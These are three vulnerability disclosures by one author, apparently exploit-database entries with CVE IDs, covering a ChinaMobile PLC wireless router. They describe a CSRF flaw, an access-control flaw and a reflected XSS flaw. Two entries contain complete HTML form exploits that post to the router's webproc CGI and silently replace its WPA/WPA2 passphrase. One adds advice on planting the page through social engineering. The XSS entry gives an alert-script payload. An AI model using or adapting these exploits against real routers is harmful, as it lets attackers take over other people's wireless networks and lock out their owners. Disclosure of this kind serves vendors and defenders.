PLC Wireless Router GPN2.4P21-C-CN -Cross-Site Request Forgery (CSRF)

Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Cross-Site Request Forgery (CSRF)
Date: 15/01/2019
Exploit Author: Kumar Saurav
Vendor: ChinaMobile
Category: Hardware
Version: GPN2.4P21-C-CN (Firmware: W2001EN-00)
Tested on: Windows
CVE ID: CVE-2019-6282

Description: ChinaMobile PLC Wireless Router GPN2.4P21-C-CN devices with firmware W2001EN-00 have CSRF vulnerability via the cgi-bin/webproc?getpage=html/index.html subpage=wlsecurity URI, allowing an Attacker to change the Wireless Security Password.

Reproduction Steps:

Note: This enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.

Step 1: User login to PLC wireless router
Step 2: User visits the attacker’s malicious web page (PLC_CSRF.html)
Step 3: PLC_CSRF.html exploits CSRF vulnerability and changes the wireless Security (WPA/WPA2) key to “PSWDmatlo331#@!”

Step 4: (192.168.59.254 in my Case)
<html>
<body>
<form method=”POST” action=”http://192.168.59.254:80/cgi-bin/webproc “>
<input type=”text” name=”sessionid” value=”2a39a09e”>
<input type=”text” name=”language” value=”en_us”>
<input type=”text” name=”sys_UserName” value=”admin”>
<input type=”text” name=”var:menu” value=”setup”>
<input type=”text” name=”var:page” value=”wireless”>
<input type=”text” name=”var:subpage” value=”wlsecurity”>
<input type=”text” name=”var:errorpage” value=”wlsecurity”>
<input type=”text” name=”getpage” value=”html/index.html”>
<input type=”text” name=”errorpage” value=”html/index.html”>
<input type=”text” name=”var:arrayid” value=”0″>
<input type=”text” name=”obj-action” value=”set”>
<input type=”text” name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.BeaconType ” value=”11i”>
<input type=”text” name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iEncryptionModes” value=”AESEncryption”>
<input type=”text” name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iAuthenticationMode” value=”PSKAuthentication”>
<input type=”text” name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_WPAGroupRekey” value=”100″>
<input type=”text” name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.PreSharedKey.1.KeyPassphrase” value=”PSWDmatlo331#@!”>
<input type=”text” name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_PSKExpression” value=”KeyPassphrase”>
<input type=”submit” value=”Send”>
</form>
</body>
</html>

Reference:https://youtu.be/x-r4lnWPdzY

PLC Wireless Router GPN2.4P21-C-CN -Incorrect Access Control

Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Incorrect Access Control
Date: 15/01/2019
Exploit Author: Kumar Saurav
Vendor: ChinaMobile
Category: Hardware
Version: GPN2.4P21-C-CN (Firmware: W2001EN-00)
Tested on: Windows
CVE ID: CVE-2019-6279

Description: ChinaMobile PLC Wireless Router GPN2.4P21-C-CN devices with firmware W2001EN-00 have an Incorrect Access Control vulnerability via the cgi-bin/webproc?getpage=html/index.html subpage=wlsecurity URI, allowing an Attacker to change the Wireless Security Password.

Reproduction Steps:
Step 1: Building a malicious html web page
Step 2: Attacker’s wants to change the wireless security (WPA/WPA2) key to “PSWDmatlo331#@!” (in my case)

Step 3: (192.168.59.254 in my Case) 
<html>
<body>
<form method=”POST” action=”http://192.168.59.254:80/cgi-bin/webproc “>
<input type=”text” name=”sessionid” value=”2a39a09e”>
<input type=”text” name=”language” value=”en_us”>
<input type=”text” name=”sys_UserName” value=”admin”>
<input type=”text” name=”var:menu” value=”setup”>
<input type=”text” name=”var:page” value=”wireless”>
<input type=”text” name=”var:subpage” value=”wlsecurity”>
<input type=”text” name=”var:errorpage” value=”wlsecurity”>
<input type=”text” name=”getpage” value=”html/index.html”>
<input type=”text” name=”errorpage” value=”html/index.html”>
<input type=”text” name=”var:arrayid” value=”0″>
<input type=”text” name=”obj-action” value=”set”>
<input type=”text” name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.BeaconType ” value=”11i”>
<input type=”text” name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iEncryptionModes” value=”AESEncryption”>
<input type=”text” name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iAuthenticationMode” value=”PSKAuthentication”>
<input type=”text” name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_WPAGroupRekey” value=”100″>
<input type=”text” name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.PreSharedKey.1.KeyPassphrase” value=”PSWDmatlo331#@!”>
<input type=”text” name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_PSKExpression” value=”KeyPassphrase”>
<input type=”submit” value=”Send”>
</form>
</body>
</html>

Step 4: save this as Incorrect_Access_Control.html
Step 5: Planting this malicious web page (Incorrect_Access_Control.html) that are likely to be visited by the victim’s (by social engineering) or any user connected in the Access Point (AP) will have to visit this page or any attacker’s connected in the AP will trigger this exploit.
Step 6: After execution of above exploit, wireless security (WPA/WPA2) key will change!!

Note: This vulnerability allowing an attacker to reproduce without login.

Reference:  https://www.youtube.com/watch?v=-cw04rOYREQ

PLC Wireless Router GPN2.4P21-C-CN -Reflected XSS

Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Reflected XSS
Date: 21/12/2018
Exploit Author: Kumar Saurav
Vendor: ChinaMobile
Category: Hardware
Version: GPN2.4P21-C-CN (Firmware: W2001EN-00)
Tested on: Multiple
CVE ID : CVE-2018-20326

Description: PLC Wireless Router’s are vulnerable to a Reflected Cross Site Scripting (XSS).With this attack, the threat actor can steal cookies, session id, username or other sensitive information redirect an innocent victim to a malicious website, thus compromising the user.

Reproduction Steps:
Step 1: Go to Wi-fi Router Gateway (192.168.59.254 in my case)
Step 2: Login as Username and Password
Step 3: After Login below url will be shown
(http://192.168.59.254/cgi-bin/webprocgetpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=-)
Step 4: Insert the payload “<script>alert(“XSS-Saurav”)</script>” at the end of the above mentinoed url and hit enter
(http://192.168.59.254/cgi-bin/webprocgetpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=-
<script>alert(“XSS-Saurav”)</script> )
Step 5: On execution of the payload, it will be popped up as “XSS-Saurav”

Reference: https://youtu.be/TwNi05yfQks